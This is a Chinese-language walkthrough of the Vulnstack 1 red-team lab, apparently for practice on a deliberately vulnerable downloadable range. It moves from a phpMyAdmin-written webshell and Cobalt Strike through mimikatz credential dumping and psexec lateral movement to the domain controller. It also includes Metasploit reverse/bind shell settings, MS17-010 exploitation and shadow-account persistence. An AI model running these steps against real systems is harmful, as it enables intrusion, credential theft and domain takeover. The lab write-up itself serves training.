Vulnstack 红队(一)
靶机为红日安全分享的靶机
靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/
网络拓展图
0x01 CS打法
WEB外网机信息收集
端口信息
80端口开放(HTTP) ,3306开放(MYSQL)
访问WEB服务返回phpStudy探针 root root弱口令尝试登录MYSQL成功
扫一波目录 出现phpmyadmin
登录phpmyadmin通过日志文件写入一句话木马
菜刀连接
我是谁
我在哪
存在域god.org 并且有两张网卡,192.168.43.1/24是攻击机与WEB模拟的外网网卡,另外还有一张192.168.52.1/24网卡
tasklist /svc查看进程 对比有无杀软
对比无杀软
上线CS && net view
还有WEB外网机的内网IP域成员 192.168.52.143,192.168.52.138为域控,192.168.52.141为域成员
hashdump抓hash密码
mimikatz抓明文密码
中转beacon 监听IP为WEB服务器 域内网卡IP192.168.52.143就可以跟域内主机通信
portscan扫一波192.168.52.0/24段
查看抓到的凭证
查看目标
最下面那条为WEB外网机
psexec在192.168.52.138上登录域管凭证
再登录192.168.52.141
ipconfig /all查看192.168.52.138的网卡
只有一张192.168.52.0/24内网网卡
ipconfig /all查看192.168.52.141的网卡
也只有一张内网网卡
0x02 MSF MS17-010打法
目标处查看域内另外两台主机的开放端口
发现都开放了SMB 445端口
此时可以CS派生shell到MSF打MS17-010
CS添加外部监听器
派生到Beacon
use multi/handler调用监听模块 && set payload windows/meterpreter/reverse_http 设置HTTP监听模块 && set LHOST 192.168.43.128设置监听IP && set LPORT 666监听端口 && run/exploit
返回msfShell meterpreter会话
run post/multi/manage/autoroute自动添加路由
background把session放到后台 && use auxiliary/scanner/smb/smb_ms17_010 调用ms17-010扫描模块 扫描开放445端口的主机
use exploit/windows/smb/ms17_010_eternalblue调用ms17010漏洞利用模块
目标出网时反向打:set payload windows/x64/meterpreter/reverse_tcp
目标不出网时正向打(如添加了路由):set payload windows/x64/meterpreter/bind_tcp
这里不出网所以set payload windows/x64/meterpreter/bind_tcp
执行完成,但没返回session
换一台试试
也一样,可能存在ms17010漏洞,但不返回session,我们换个打法,use auxiliary/admin/smb/ms17_010_command模块直接执行命令看看
都能远程执行命令,并且都是system权限,可以添加影子账户,再开3389端口,做隧道连接登录,后面就自行发挥了
打完收工·.·